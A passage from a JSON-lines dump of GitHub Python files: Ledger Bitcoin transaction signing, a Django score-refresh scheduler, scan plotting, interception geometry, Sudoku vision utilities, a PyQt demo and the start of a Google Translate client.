tx.VarInt(len(script)).to_bytes()\n\n    # the first packet is the outpoint and value\n    chunks.append(b'\\x02'  # 02 is ledger-speak for segwit input\n                  + tx_in.outpoint.to_bytes()\n                  + le_value\n                  + script_len_bytes)\n\n    # Chunk into 50-byte chunks\n    chunks.extend([script[i:i + 50] for i in range(0, len(script), 50)])\n\n    # append the sequence to the last one\n    chunks[-1] = chunks[-1] + tx_in.sequence\n\n    return [_transaction_continue_packet(chunk) for chunk in chunks]\n\n\ndef _packetize_vout(tx_outs: Tuple[tx.TxOut, ...]) -> List[bytes]:\n    '''Converts the output vector into apdu packets'''\n    # first get the whole length-prefixed vector\n    data_to_be_chunked = bytearray()\n    data_to_be_chunked.extend(tx.VarInt(len(tx_outs)).to_bytes())\n    for tx_out in tx_outs:\n        data_to_be_chunked.extend(tx_out.to_bytes())\n\n    # chunk it into 50 byte chunks\n    chunks = [data_to_be_chunked[i:i + 50]  # chunk the data\n              for i in range(0, len(data_to_be_chunked), 50)]\n\n    # make continue packets for all but the last one\n    packets = []\n    packets.extend([_output_continue_packet(chunk) for chunk in chunks[:-1]])\n\n    # the last one is a final packet\n    packets.append(_output_final_packet(chunks[-1]))\n\n    # return all the apdu packets\n    return packets\n\n\ndef _transaction_final_packet(\n        lock_time: bytes,\n        path: List[int],\n        sighash_type: int) -> bytes:\n    '''\n    UNTRUSTED HASH SIGN packet with locktime and sighash type\n    This packet actually requests the sig\n\n    Args:\n        lock_time (bytes): 4 byte LE-encoded locktime field\n        path (List[int]): list of derivation indices\n        sighash_type (int): bitcoin consensus sighash type. NONE not supported\n    Returns:\n        (bytes): the apdu packet\n    '''\n    data = bytearray()\n    data.extend(blue.derivation_path_to_apdu_data(path))  # derivation info\n    data.extend(b'\\x00')  # user validation code ??\n    data.extend(lock_time)\n    data.append(sighash_type)\n    return blue.make_apdu(\n        command=b'\\x48',\n        data=data)\n\n\nasync def _get_sig(\n        client: blue.Ledger,\n        first_packet: bytes,\n        last_packet: bytes,\n        tx_in: tx.TxIn,\n        prevout_info: PrevoutInfo) -> bytes:\n    '''\n    Gets a signature for an input\n    Args:\n        first_packet (bytes): the first packet e0440000... (input start)\n        last_packet (bytes): the last packet e0480000... (hash sign)\n        tx_in (tx.TxIn): the transaction input\n        prevout_info (PrevoutInfo): the script and value of the prevout\n    Returns:\n        (bytes): the signature, unmasked\n    '''\n    # for convenience, we do surgery on the packet directly\n    # yes, this is messy, but it's more straightforward than rebuilding it:
\n    # - p1+p2 set to 0x0080 marks this as a new pseudo-tx continuation\n    # - the second-to-last byte set to 1 overwrites len(vin)\n    first_packet = (first_packet[0:2]\n                    + b'\\x00\\x80'  # overwrite p1+p2\n                    + first_packet[4:-2]\n                    + b'\\x01'  # overwrite len(vin)\n                    + first_packet[-1:])\n\n    # they need to be packetized with their witness script\n    input_packets = _packetize_input_for_signing(tx_in, prevout_info)\n\n    # Send all the packets and the sig-request packet\n    await client.exchange(first_packet)\n    for packet in input_packets:\n        await client.exchange(packet)\n    response = await client.exchange(last_packet)  # request the sig\n\n    # unmask the sig before we return it\n    return _unmask_sig(response)\n\n\ndef _signable(\n        key: bytes,\n        prevout_info: PrevoutInfo) -> bool:\n    '''\n    Determines if the key or its hash is in the PrevoutInfo\n    We use this to determine whether we should get a signature for an input\n\n    Args:\n        key (bytes): the public key\n        prevout_info (PrevoutInfo): dict of script and value for the prevout\n    Returns:\n        (bool): True if signable, false otherwise\n    '''\n    if len(key) in [64, 65]:\n        key = utils.compress_pubkey(key)  # enforce compression\n\n    # if there's no script, it's not signable\n    if prevout_info['witness_script'] is None:\n        return False\n\n    # if the key is anywhere in the script, it is signable\n    script = cast(bytes, prevout_info['witness_script'])\n    if (key in script or rutils.hash160(key) in script):\n        return True\n\n    return False\n\n\ndef _unmask_sig(sig: bytes) -> bytes:\n    '''Ledger masks the first byte with 0xFE. We need to remove the mask'''\n    first_byte = sig[0] & 0xfe\n    sig = bytes([first_byte]) + sig[1:]\n    return sig\n\n\nasync def get_tx_signatures(\n        client: blue.Ledger,\n        t: tx.Tx,\n        prevouts: List[PrevoutInfo],\n        derivation: str,\n        sighash_type: int = SIGHASH_ALL) -> List[Optional[bytes]]:\n    '''\n    Sign a transaction\n    Args:\n        client (Ledger): the Ledger context manager object\n        t (tx.Tx): The transaction to sign\n        prevouts (List[PrevoutInfo]): value for each Prevout\n            must include the script if we intend to sign the input\n            script must NOT be length-prefixed (e.g. 76a914... NOT 1976a914...)\n        derivation (str): m-prefixed derivation for the signing key\n        sighash_type (int): Bitcoin-consensus sighash type, ledger\n            firmware currently only supports ALL\n    Returns:\n        List[Optional[bytes]]: For each input, either a signature or None\n    '''\n    if len(prevouts) != len(t.tx_ins):\n        raise ValueError('mismatch between txins and prevouts')\n\n    if sighash_type != SIGHASH_ALL:\n        raise ValueError('ledger firmware only supports SIGHASH_ALL')\n\n    # Let's get the key so we can scan scripts for it\n    key = await get_uncompressed_public_key(client, derivation)\n\n    # start by packetizing version and len(vin)\n    first_packet = _packetize_version_and_vin_length(t)\n    packets = [first_packet]  # collect a list of packets for sending later\n\n    # packetize each input\n    for pair in zip(t.tx_ins, prevouts):\n        packets.extend(_packetize_input(*pair))\n\n    # packetize the whole vout\n    packets.extend(_packetize_vout(t.tx_outs))\n\n    # send all vin/vout packets\n    for packet in packets:\n        await client.exchange(packet)\n\n    # calculate the request packet\n    indices = utils.parse_derivation(derivation)\n    last_packet = _transaction_final_packet(t.lock_time, indices, sighash_type)\n\n    # build sigs. 
If we're not signing the input, return None at its index\n sigs = []\n for pair in zip(t.tx_ins, prevouts):\n sigs.append(await _get_sig(client, first_packet, last_packet, *pair)\n if _signable(key, pair[1])\n else None)\n\n return sigs\n","repo_name":"summa-tx/riemann-ledger","sub_path":"ledger/btc.py","file_name":"btc.py","file_ext":"py","file_size_in_byte":11636,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"40"} +{"seq_id":"35659560838","text":"# Adapted from https://pypi.org/project/django-apscheduler/\n\nfrom ...LiveScore_Requests import list_by_date\n\nimport logging\n\nfrom django.conf import settings\n\nfrom apscheduler.schedulers.blocking import BlockingScheduler\nfrom apscheduler.triggers.cron import CronTrigger\nfrom django.core.management.base import BaseCommand\nfrom django_apscheduler.jobstores import DjangoJobStore\nfrom django_apscheduler.models import DjangoJobExecution\nfrom django_apscheduler import util\n\nfrom datetime import datetime, timedelta\nfrom django.utils import timezone\n\nlogger = logging.getLogger(__name__)\n\n\ndef refresh_live_scores():\n # now = datetime.now()\n # this is in GMT\n now = timezone.now()\n day = now.strftime(\"%Y%m%d\")\n hour = now.strftime(\"%H\")\n\n print(\"Now: \", now)\n print(\"Executed refresh_live_scores command at \", day)\n print(\"Hour: \", hour)\n\n # 5 calls every 12 hours,\n # 6 more single day calls every 3 hours\n # 16 total API calls per day\n \n if hour == \"00\" or hour == \"12\":\n # loop to call previous 1 days through next 3 days\n call_list = [now - timedelta(days=x) for x in range(-3, 2)]\n for date in call_list:\n formattedDate = date.strftime(\"%Y%m%d\")\n print(formattedDate)\n # LiveScore_Request\n list_by_date(formattedDate)\n else:\n print(day)\n # LiveScore_Request\n list_by_date(day)\n \n print(\"End of scheduled API call\") \n \n \n \n\n\n\n# The `close_old_connections` decorator ensures that database connections, that have become\n# unusable or are obsolete, are closed before and after your job has run. You should use it\n# to wrap any jobs that you schedule that access the Django database in any way. 
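\n#\n# A hedged illustration (added; not part of the original project): any other\n# scheduled job that touches the Django ORM should get the same decorator\n# treatment, for example:\n@util.close_old_connections\ndef example_db_job():\n    # counting job executions is just a stand-in for any ORM access\n    DjangoJobExecution.objects.count()\n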
\n@util.close_old_connections\ndef delete_old_job_executions(max_age=604_800):\n \"\"\"\n This job deletes APScheduler job execution entries older than `max_age` from the database.\n It helps to prevent the database from filling up with old historical records that are no\n longer useful.\n \n :param max_age: The maximum length of time to retain historical job execution records.\n Defaults to 7 days.\n \"\"\"\n DjangoJobExecution.objects.delete_old_job_executions(max_age)\n\n\nclass Command(BaseCommand):\n help = \"Runs APScheduler.\"\n\n def handle(self, *args, **options):\n scheduler = BlockingScheduler(timezone=settings.TIME_ZONE)\n scheduler.add_jobstore(DjangoJobStore(), \"default\")\n\n scheduler.add_job(\n refresh_live_scores,\n trigger=CronTrigger(hour=\"*/3\"), # Every 3 hours\n # trigger=CronTrigger(second=\"*/10\"), # Every 10 seconds\n # trigger=CronTrigger(minute=\"*/2\"), # Every 2 minutes\n id=\"refresh_live_scores\", # The `id` assigned to each job MUST be unique\n max_instances=1,\n replace_existing=True,\n )\n logger.info(\"Added job 'refresh_live_scores'.\")\n\n scheduler.add_job(\n delete_old_job_executions,\n trigger=CronTrigger(\n day_of_week=\"mon\", hour=\"00\", minute=\"00\"\n ), # Midnight on Monday, before start of the next work week.\n id=\"delete_old_job_executions\",\n max_instances=1,\n replace_existing=True,\n )\n logger.info(\n \"Added weekly job: 'delete_old_job_executions'.\"\n )\n\n try:\n logger.info(\"Starting scheduler...\")\n scheduler.start()\n except KeyboardInterrupt:\n logger.info(\"Stopping scheduler...\")\n scheduler.shutdown()\n logger.info(\"Scheduler shut down successfully!\")","repo_name":"dwindleduck/no-spoilers-tennis-server","sub_path":"tennis/management/commands/refresh_LiveScore.py","file_name":"refresh_LiveScore.py","file_ext":"py","file_size_in_byte":3463,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"8384472619","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Mon Nov 23 21:56:41 2020\r\n\r\n@author: Nagnanamus\r\n\"\"\"\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\nimport pickle as pkl\r\n\r\nfilepath = \"../houseScan.pkl\"\r\nwith open(filepath,'rb') as fh:\r\n ptsdata = pkl.load(fh)\r\n \r\nfor idx in range(5):\r\n fig,ax = plt.subplots(1, 1)\r\n\r\n rngs = np.array(ptsdata[idx]['ranges'])\r\n \r\n angle_min=ptsdata[idx]['angle_min']\r\n angle_max=ptsdata[idx]['angle_max']\r\n angle_increment=ptsdata[idx]['angle_increment']\r\n ths = np.arange(angle_min,angle_max+angle_increment,angle_increment)\r\n p=np.vstack([np.cos(ths),np.sin(ths)])\r\n \r\n \r\n ptset = rngs.reshape(-1,1)*p.T\r\n \r\n safeptsidx = (rngs<=ptsdata[idx]['range_max']) & (rngs>=ptsdata[idx]['range_min'])\r\n ptset = ptset[safeptsidx,:]\r\n \r\n ax.plot(ptset[:,0],ptset[:,1],'bo')\r\n","repo_name":"nadurthi/ResearchCodes","sub_path":"plotscans.py","file_name":"plotscans.py","file_ext":"py","file_size_in_byte":869,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"23942305577","text":"import numpy as np\nfrom numpy import linalg as LA\nfrom math import *\nimport matplotlib.pyplot as plt\nfrom mpl_toolkits.mplot3d import Axes3D\nfrom random import random\nfrom scipy.signal import argrelextrema\n\nOBS_TIME = 40\nstep = pi / 250\n\n\ndef main():\n # Create a figure with two subplots\n fig = plt.figure(figsize=(10, 5))\n # Add the first subplot (3D plot)\n ax = fig.add_subplot(121, projection='3d')\n # Add the second subplot 
(2D plot)\n ax2 = fig.add_subplot(122)\n\n # Pick random configuration until it finds desired one\n while (1):\n # TS\n Origin = np.array([random() * 10 - 5, random() * 10 - 5, 0])\n Speed = random() * 5 + 0.5\n Heading = 2 * pi * random() - pi\n Direction = np.array([Speed * cos(Heading), Speed * sin(Heading), 1])\n # OS\n OS_Speed = random() * 5 + 0.5\n\n points = getIntersectionTime_new(Origin, Direction, OS_Speed)\n\n if len(points) > 0:\n # Desired config\n \"\"\"OS_Speed >= Speed and len(points) > 1 and\"\"\"\n all_positives = True\n for p in points:\n if p[0] < 0:\n all_positives = False\n if all_positives:\n break\n else:\n print(\"NO\")\n\n ax = SetUpPlot(Origin, OS_Speed, Direction, fig, ax)\n # Print data\n print(\"\\nTS \\n Origin: \", Origin[0], \" \", Origin[1], \"\\n Heading: \", Heading, \"/\", round(Heading/pi*180,2), \"\\n Speed: \", Speed)\n print(\"OS \\n Speed: \", OS_Speed, '\\n')\n\n print(\"\\nNew method results\")\n print(\" Cone interception in \", len(points), \" points.\")\n count = 0\n for point in points:\n ax = PlotPath(ax, np.array([0, 0, 0]), point[1], count + 1)\n #print(atan2(point[1][1],point[1][0]))\n print_pos(point, OS_Speed, Direction, Origin, False)\n count = count + 1\n poss = np.array([p[1] for p in points])\n ax.set_zlim(np.min(np.concatenate(poss)) - 10, np.max(np.concatenate(poss)) + 10)\n ax.legend()\n\n # Brute force\n print(\"\\nBrute force results\")\n thetas = np.arange(-pi, pi, 0.01)\n dists = np.array([])\n for theta in thetas:\n t = Origin[0] / (OS_Speed * cos(theta) - Speed * cos(Heading))\n distance = distance_t(t, OS_Speed, theta, Direction, Origin)\n dists = np.append(dists, distance)\n ax2.scatter(theta, distance, color='red')\n # Find the indices of local minima in the first values array\n min_dists = argrelextrema(dists, np.less)\n # Extract the corresponding tuples for the local minima\n thetas_min_dists = [thetas[index] for index in min_dists[0]]\n for theta in thetas_min_dists:\n t = Origin[0] / (OS_Speed * cos(theta) - Speed * cos(Heading))\n p = Origin + t * Direction\n #if t<0:\n #print(\" atan2 _ \", pi+atan2(p[1], p[0]) % 2*pi)\n # print(\" acos _ \", acos((Origin[0]+Speed*cos(Heading))/(OS_Speed*t)))\n point = [t, p, theta]\n print_pos(point, OS_Speed, Direction, Origin, True)\n\n ax.set_title('OS speed cone - TS interception')\n ax2.set_title('Distance TS-OS at interception time for each theta')\n ax2.set_xlabel(\"theta\")\n ax2.set_ylabel(\"distance\")\n ax2.set_ylim([0, 10])\n\n # Old method\n print(\"\\nOld method results\")\n points = getIntersectionTime_old(Origin, Heading, Speed, OS_Speed)\n for point in points:\n print_pos(point, OS_Speed, Direction, Origin, True)\n\n txt = \"\"\"\\n\\nThe different thetas, when time is negative, depends on the meaning of a negative time. 
\n    TS has a fixed heading, so negative time means a position found with negative velocity.\n    OS instead,\n    - Could have had a heading useful to intercept TS said time ago (theta found with cone)\n    - Could intercept, backwards, TS with negative velocity (theta found with brute force)\"\"\"\n    print(txt)\n    # fig.text(.1, .1, \"fsfafa\")\n    # Adjust layout for better visualization\n    plt.tight_layout()\n    # Show the plots\n    plt.show()\n\n\ndef print_pos(point, OS_Speed, Direction, Origin, booool):\n    t = point[0]\n    p = point[1]\n    theta = point[2]\n    if booool:\n        distance = distance_t(t, OS_Speed, theta, Direction, Origin)\n        print(\" Time: \", round(t, 2), \" theta: \", round(theta, 2), \"distance: \", round(distance, 2), \" (\",\n              p[0], \",\", p[1], \")\")\n    else:\n        print(\" Time: \", round(t, 2), \" theta: \", round(theta, 2), \" (\",\n              p[0], \",\", p[1], \")\")\n\ndef distance_t(t, OS_Speed, theta, Direction, Origin):\n    p_OS = t * np.array([OS_Speed * cos(theta), OS_Speed * sin(theta), 1])\n    p_TS = Origin + Direction * t\n    return LA.norm(p_OS - p_TS)\n\n\ndef getIntersectionTime_old(Origin, Heading, Speed, OS_Speed):\n    v1 = OS_Speed\n    v2 = Speed\n    h2 = Heading\n    H = Origin[1]\n    L = Origin[0]\n\n    k = atan2(-H, L)\n    asin_arg = v2 / v1 * sin(h2 + k)\n    theta1 = asin(asin_arg) - k\n    theta2 = pi - asin(asin_arg) - k  # second branch of the arcsine\n    theta2 = atan2(sin(theta2), cos(theta2))  # wrap to (-pi, pi]\n    t1 = L / (v1 * cos(theta1) - v2 * cos(h2))\n    t2 = L / (v1 * cos(theta2) - v2 * cos(h2))\n\n    p = np.array([L, H]) + t1 * np.array([v2 * cos(h2), v2 * sin(h2)])\n    ipoint = [t1, p, theta1]\n    p = np.array([L, H]) + t2 * np.array([v2 * cos(h2), v2 * sin(h2)])\n    ipoint2 = [t2, p, theta2]\n\n    return [ipoint, ipoint2]\n\n\ndef getIntersectionTime_new(Origin, Direction, OS_Speed):\n    gamma = sqrt(OS_Speed ** 2 + 1) / (OS_Speed ** 2 + 1)\n    c2 = 1 - gamma ** 2 * np.dot(Direction, Direction)\n    c1 = -gamma ** 2 * np.dot(Direction, Origin)\n    c0 = -gamma ** 2 * np.dot(Origin, Origin)\n    delta = c1 ** 2 - c0 * c2\n\n    if c2 != 0:\n        \"\"\"if delta < 0:\n            print(\" No intersections\")\n        el\"\"\"\n        if delta == 0:\n            t = (-c1 + sqrt(delta)) / c2\n            p = Origin + Direction * t\n            ipoint = [t, p, atan2(p[1], p[0])]\n            # print(\" Theta: \", atan2(p[1], p[0]), \"time: \", t, \" (\", p[0], \",\", p[1], \")\")\n            return [ipoint, [0, np.array([0, 0, 0]), 0]]\n        elif delta > 0:\n            t1 = (-c1 + sqrt(delta)) / c2\n            t2 = (-c1 - sqrt(delta)) / c2\n            p = Origin + Direction * t1\n            ipoint1 = [t1, p, atan2(p[1], p[0])]\n            dis = distance_t(t1, OS_Speed, atan2(p[1], p[0]), Direction, Origin)\n\n            p = Origin + Direction * t2\n            ipoint2 = [t2, p, atan2(p[1], p[0])]\n            dis = distance_t(t2, OS_Speed, atan2(p[1], p[0]), Direction, Origin)\n\n            return [ipoint1, ipoint2]\n    elif c2 == 0:\n        if c1 != 0:\n            t = -c0 / (2 * c1)\n            p = Origin + Direction * t\n            ipoint = [t, p, atan2(p[1], p[0])]\n            # print(\" Theta: \", atan2(p[1], p[0]), \"time: \", t, \" (\", p[0], \",\", p[1], \")\")\n            return [ipoint, [0, np.array([0, 0, 0]), 0]]\n        else:\n            print(\" wtf, ts and os coincide\")\n\n    return []\n\n\ndef SetUpPlot(TS, speed, vel_vect, fig, ax):\n    # Plot the 3D subplot\n    ax = fig.add_subplot(121, projection='3d')\n\n    # fig = plt.figure()\n    # ax = fig.add_subplot(111, projection='3d')\n    ax.scatter(TS[0], TS[1], TS[2], label='obs origin')\n    ax.scatter(0, 0, 0, label='vh origin')\n\n    ax = PlotPath(ax, TS, TS + vel_vect * OBS_TIME, 'obs path')\n\n    line_x, line_y, line_z = zip(TS, TS - vel_vect * OBS_TIME)\n    ax.plot(line_x, line_y, line_z, color='c')\n\n    ax = ConePlot(ax, speed)\n\n    # Set labels for the axes\n    ax.set_xlabel('X')\n    ax.set_ylabel('Y')\n    ax.set_zlabel('t')
\n    return ax\n\n\ndef PlotPath(ax, p1, p2, name):\n    line_x, line_y, line_z = zip(p1, p2)\n    ax.plot(line_x, line_y, line_z, label=name)\n    ax.scatter(p2[0],p2[1],p2[2])\n    return ax\n\n\ndef ConePlot(ax, speed):\n    theta = pi / 2 - atan2(1, speed)\n    for a in range(0, int(2 * pi / step)):\n        # Calculate the current angle\n        angle = a * step\n        p2 = np.array([0, 0, speed * OBS_TIME])\n        p2 = y_rotation(p2, -theta)\n        p2 = z_rotation(p2, angle)\n        line_x, line_y, line_z = zip(np.array([0, 0, 0]), p2)\n        ax.plot(line_x, line_y, line_z, '-r', alpha=0.2)\n        line_x, line_y, line_z = zip(np.array([0, 0, 0]), -p2)\n        ax.plot(line_x, line_y, line_z, '-', color='grey', alpha=0.2)\n    return ax\n\n\ndef x_rotation(vector, theta):\n    \"\"\"Rotates 3-D vector around x-axis\"\"\"\n    R = np.array([[1, 0, 0], [0, np.cos(theta), -np.sin(theta)], [0, np.sin(theta), np.cos(theta)]])\n    return np.dot(R, vector)\n\n\ndef y_rotation(vector, theta):\n    \"\"\"Rotates 3-D vector around y-axis\"\"\"\n    R = np.array([[np.cos(theta), 0, np.sin(theta)], [0, 1, 0], [-np.sin(theta), 0, np.cos(theta)]])\n    return np.dot(R, vector)\n\n\ndef z_rotation(vector, theta):\n    \"\"\"Rotates 3-D vector around z-axis\"\"\"\n    R = np.array([[np.cos(theta), -np.sin(theta), 0], [np.sin(theta), np.cos(theta), 0], [0, 0, 1]])\n    return np.dot(R, vector)\n\n\nmain()\n","repo_name":"SamueleD98/oal","sub_path":"src/intercept_test.py","file_name":"intercept_test.py","file_ext":"py","file_size_in_byte":8803,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"74912397561","text":"import cv2\nimport numpy as np\nimport matplotlib.pyplot as plt\n\ndef preprocess(image, default=19, dilate=True):\n    '''\n    Darken grid and preliminary thresholding\n    '''\n    img = cv2.GaussianBlur(image,(5,5),0)\n    thresh = cv2.adaptiveThreshold(img,255,cv2.ADAPTIVE_THRESH_MEAN_C, cv2.THRESH_BINARY_INV,default,2)\n    kernel = cv2.getStructuringElement(cv2.MORPH_CROSS,(3,3))\n    res = cv2.dilate(thresh, kernel) if dilate else thresh\n    return res\n\ndef orderPoints(cnt):\n    '''\n    Rearrange 4 point contour in clockwise direction starting from top left\n    '''\n    cnt = cnt.reshape((4,2))\n    rect = np.zeros((4,2), dtype='float32')\n    s = cnt.sum(axis=1)\n    rect[0] = cnt[np.argmin(s)] # Top-Left\n    rect[2] = cnt[np.argmax(s)] # Bottom-Right\n    diff = np.diff(cnt, axis=1)\n    rect[1] = cnt[np.argmin(diff)] # Top-Right\n    rect[3] = cnt[np.argmax(diff)] # Bottom-Left\n    return rect\n\ndef four_point_transform(img, contour):\n    '''\n    Unwarp Puzzle and Enlarge Puzzle\n    '''\n    \n    epsilon = 0.1*cv2.arcLength(contour,True)\n    approx = cv2.approxPolyDP(contour,epsilon,True)\n\n    (tl, tr, br, bl) = rect = orderPoints(approx)  # unpack in orderPoints' clockwise order\n    \n    # c^2 = x^2 + y^2\n    widthA = np.sqrt(((br[0] - bl[0]) ** 2) + ((br[1] - bl[1]) ** 2))\n    widthB = np.sqrt(((tr[0] - tl[0]) ** 2) + ((tr[1] - tl[1]) ** 2))\n    maxWidth = max(int(widthA), int(widthB))\n    \n    heightA = np.sqrt(((tr[0] - br[0]) ** 2) + ((tr[1] - br[1]) ** 2))\n    heightB = np.sqrt(((tl[0] - bl[0]) ** 2) + ((tl[1] - bl[1]) ** 2))\n    maxHeight = max(int(heightA), int(heightB))\n    \n    dst = np.array([[0, 0],[maxWidth - 1, 0],[maxWidth - 1, maxHeight - 1], [0, maxHeight - 1]], dtype = \"float32\")\n    \n    M = cv2.getPerspectiveTransform(rect, dst)\n    warped = cv2.warpPerspective(img, M, (maxWidth, maxHeight))\n    return warped
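\n\n# Hedged usage sketch (added; 'gray' is an assumed grayscale puzzle photo):\n#\n#   mask = preprocess(gray)\n#   _, cnts, _ = cv2.findContours(mask, cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_SIMPLE)\n#   puzzle = four_point_transform(gray, max(cnts, key=cv2.contourArea))\n\ndef centralize(output, centroid, label):\n    img2 = np.zeros(output.shape)\n    img2[output == label] = 255.0\n\n    rows, cols = img2.shape \n    target_center = (int(rows/2), int(cols/2))\n    shift_x, shift_y = np.round(target_center -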
centroid).astype('float32')\n\n M = np.array([[1,0, shift_x], [0,1,shift_y]])\n\n dst = cv2.warpAffine(img2, M, (cols,rows))\n return dst\n \n\ndef largestnConnectedComponents(cell, n=4):\n nb_components, output, stats, centroids = cv2.connectedComponentsWithStats(cell, connectivity=4)\n sizes = stats[:, -1]\n indices = np.argsort(sizes)[::-1][:n]\n return output, indices, sizes[indices], centroids[indices]\n\ndef digitExists(cell, threshold=0.056):\n total_cell = cell.shape[0] * cell.shape[1]\n if np.count_nonzero(cell) / total_cell > threshold:\n return True\n else:\n return False\n\ndef extractdigits(cell_y,cell_x,grid, n=2, this=False):\n '''\n Returns a few images containing the largest components detected within the cell\n If None, returns empty list\n '''\n # x, y coordinates of the cell passed\n y_skips = int(np.floor(grid.shape[0] / 9))\n x_skips = int(np.floor(grid.shape[1] /9 ))\n \n y = y_skips * cell_y\n x = x_skips * cell_x\n \n cell = grid[y:y+y_skips, x:x+x_skips]\n\n\n # Check cell white percentage\n if not digitExists(cell):\n return []\n \n # Get the n largest connected Components\n output, indices, sizes, centroids = largestnConnectedComponents(cell, n)\n \n images = []\n centroids = centroids[1:]\n indices = indices[1:]\n for label, centroid in zip(indices, centroids):\n\n img = centralize(output, centroid, label)\n images.append(img)\n \n return images\n\ndef whitePct(img):\n return np.count_nonzero(img) / (img.shape[0] * img.shape[1]) *100\n\n\ndef repetitiveThreshold(img, target_pct):\n '''\n Repeatedly tries different blocksize for adaptive thresholding until target pct is achieved\n '''\n thres = 55\n block = 5\n whites = whitePct(img)\n\n while whites > target_pct:\n\n threshed = cv2.adaptiveThreshold(img,255,cv2.ADAPTIVE_THRESH_GAUSSIAN_C, cv2.THRESH_BINARY_INV, thres,block)\n thres += 100\n #block += 5\n whites = whitePct(threshed)\n return threshed\n\n\ndef floodfillGrid(img, overlapped, coords, i):\n '''\n Floodfill ith index of coords array, if failed, try i+1 index. 
Purpose is to remove gridlines\n    '''\n    coord = coords[i]\n    h, w = img.shape\n    u_mask = np.zeros((h+2, w+2), np.uint8)\n    if overlapped[coord[0]][coord[1]] != 0:\n        try:\n            cv2.floodFill(img, u_mask, (coord[0],coord[1]), 0)\n        except Exception:\n            # the seed pixel was unusable; let the caller retry with the next coordinate\n            return\n\ndef repetitiveFloodfill(dilated, overlapped, coords, i):\n    whites = whitePct(dilated)\n\n    while whites > 10:\n        floodfillGrid(dilated, overlapped, coords, i)\n        i += 1\n        whites = whitePct(dilated)\n\ndef aspectratio(cell, highest=0.98, lowest=0.45):\n    '''\n    Determine that the largest contour has aspect ratio within the given range\n    '''\n    cell = cell.astype('uint8')\n    _, cnt, hiers = cv2.findContours(cell,cv2.RETR_TREE,cv2.CHAIN_APPROX_SIMPLE)\n    cnt = sorted(cnt, key=cv2.contourArea, reverse=True)[0]\n    x,y,w,h = cv2.boundingRect(cnt)\n\n    return w/h < highest and w/h > lowest\n \ndef view(img, _size=(800,800)):\n    view = cv2.resize(img, _size)\n    cv2.imshow('Sudoku', view)\n    cv2.waitKey()","repo_name":"henrybyhee/SudokuVisionSolver","sub_path":"vision_utils.py","file_name":"vision_utils.py","file_ext":"py","file_size_in_byte":5207,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"33977304984","text":"import sys\r\nfrom PyQt5.QtCore import Qt, QSize\r\nfrom PyQt5.QtGui import QPainter, QImage\r\nfrom PyQt5.QtWidgets import (QApplication, QWidget)\r\n\r\n\r\nclass UFO_tracker(QWidget):\r\n    def __init__(self):\r\n        super().__init__()\r\n        self.setGeometry(200, 200, 500, 500)\r\n        self.setWindowTitle('UFO Control')\r\n        self.x = 0\r\n        self.y = 0\r\n        self.img_r = 40  # account for the image size when offsetting coordinates\r\n        self.image = QImage(QSize(10, 10), QImage.Format_RGB32)\r\n        self.image.load('UFO1.png')\r\n\r\n    def keyPressEvent(self, event):\r\n        key = event.key()\r\n        step = 10  # movement step per key press\r\n        if key == Qt.Key_Left:\r\n            self.x -= step\r\n            if self.x < 0: self.x = self.width() - self.img_r\r\n        elif key == Qt.Key_Up:\r\n            self.y -= step\r\n            if self.y < 0: self.y = self.height() - self.img_r\r\n        elif key == Qt.Key_Right:\r\n            self.x += step\r\n            if self.x > self.width() - self.img_r: self.x = 0\r\n        elif key == Qt.Key_Down:\r\n            self.y += step\r\n            if self.y > self.height() - self.img_r: self.y = 0\r\n\r\n    def paintEvent(self, event):\r\n        qp = QPainter()\r\n        qp.begin(self)\r\n        qp.drawImage(self.x, self.y, self.image)\r\n        qp.end()\r\n        self.update()\r\n\r\n\r\nif __name__ == '__main__':\r\n    app = QApplication(sys.argv)\r\n    ex = UFO_tracker()\r\n    ex.show()\r\n    sys.exit(app.exec_())\r\n","repo_name":"Alyona0/13_QT9_UFO_control","sub_path":"UFO_control.py","file_name":"UFO_control.py","file_ext":"py","file_size_in_byte":1526,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"36806047075","text":"# -*- coding: utf-8 -*-\n# Sublime Text 3 test\n__version__ = \"1.0.0\"\n\ntry:\n    # Python 3 assumption\n    from urllib.request import urlopen, HTTPHandler, HTTPSHandler, build_opener, Request\n    from urllib.parse import urlencode, quote\nexcept ImportError:\n    # Python 2 assumption\n    from urllib import urlopen, urlencode, quote\n    from urllib2 import HTTPHandler, HTTPSHandler, build_opener, Request\n\nfrom json import loads\n\nimport re\n\ntry:\n    # Python 3 assumption\n    from http.client import HTTPConnection, HTTPSConnection\nexcept ImportError:\n    # Python 2 assumption\n    from httplib import HTTPConnection, HTTPSConnection\n\nimport socks\n\nimport ssl\n\n\nclass GoogletTranslateException(Exception):\n    \"\"\"\n    Default GoogletTranslate 
exception\n >>> GoogletTranslateException(\"DoctestError\")\n GoogletTranslateException('DoctestError',)\n \"\"\"\n pass\n\n\nclass GoogletTranslate(object):\n string_pattern = r\"\\\"(([^\\\"\\\\]|\\\\.)*)\\\"\"\n match_string = re.compile(\n r\"\\,?\\[\"\n + string_pattern + r\"\\,\"\n + string_pattern\n + r\"\\]\")\n\n error_codes = {\n 401: \"ERR_TARGET_LANGUAGE_NOT_SPECIFIED\",\n 501: \"ERR_SERVICE_NOT_AVAILABLE_TRY_AGAIN_OR_USE_PROXY\",\n 503: \"ERR_VALUE_ERROR\",\n 504: \"ERR_PROXY_NOT_SPECIFIED\",\n }\n\n def __init__(self, source_lang='en', target_lang='zh-CN'):\n self.cache = {\n 'languages': None,\n }\n self.api_urls = {\n 'translate': 'https://translate.googleapis.com/translate_a/single?client=gtx&ie=UTF-8&oe=UTF-8&dt=t',\n }\n if not target_lang:\n raise GoogletTranslateException(self.error_codes[401])\n self.source = source_lang\n self.target = target_lang\n\n @property\n def languages(self, cache=True):\n try:\n if not self.cache['languages'] and cache:\n self.cache['languages'] = loads('{\"languages\":{\"af\":\"Afrikaans\",\"sq\":\"Albanian\",\"ar\":\"Arabic\",'\n 